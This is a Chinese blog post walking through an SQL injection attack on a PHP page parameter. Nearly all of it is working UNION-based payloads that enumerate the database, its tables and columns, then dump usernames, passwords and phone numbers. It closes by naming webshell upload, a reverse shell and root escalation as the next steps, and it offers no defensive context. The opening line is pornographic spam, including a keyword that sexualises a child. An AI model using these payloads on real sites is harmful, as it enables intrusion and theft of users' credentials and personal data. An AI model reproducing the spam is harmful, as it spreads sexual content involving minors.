小男孩‘自慰网亚洲一区二区,亚洲一级在线播放毛片,亚洲中文字幕av每天更新,黄aⅴ永久免费无码,91成人午夜在线精品,色网站免费在线观看,亚洲欧洲wwwww在线观看

分享

SQL注入滲透實戰(zhàn)

 Coder編程 2020-08-30

概述:

 

判斷注入點:

http://www./page.php?pid=42 and 1=1 #true

 

 

http://www./page.php?pid=42 and 1=2 #false

 

猜表的列數(shù)

http://www./page.php?pid=42 +ORDER+BY+06 #true

http://www./page.php?pid=42 +ORDER+BY+07 #false

 

爆出字段

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,2,3,4,5,6

 

爆當(dāng)數(shù)據(jù)庫信息

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5,6

 

猜解表

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),3,4,5,6

猜解表的字段

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f7573657273),3,4,5,6

 

 獲取字段數(shù)據(jù)

username,pass,mobile

http://www./page.php?pid=-42 +UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,0x23,pass,0x23,mobile+SEPARATOR+0x3c62723e)+FROM+tbl_users),3,4,5,6

 

 

完結(jié),后續(xù)就是找到后臺,嘗試上傳webshell,反彈shell,提權(quán)root一系列的操作了。

 

    本站是提供個人知識管理的網(wǎng)絡(luò)存儲空間,所有內(nèi)容均由用戶發(fā)布,不代表本站觀點。請注意甄別內(nèi)容中的聯(lián)系方式、誘導(dǎo)購買等信息,謹(jǐn)防詐騙。如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容,請點擊一鍵舉報。
    轉(zhuǎn)藏 分享 獻(xiàn)花(0

    0條評論

    發(fā)表

    請遵守用戶 評論公約

    類似文章 更多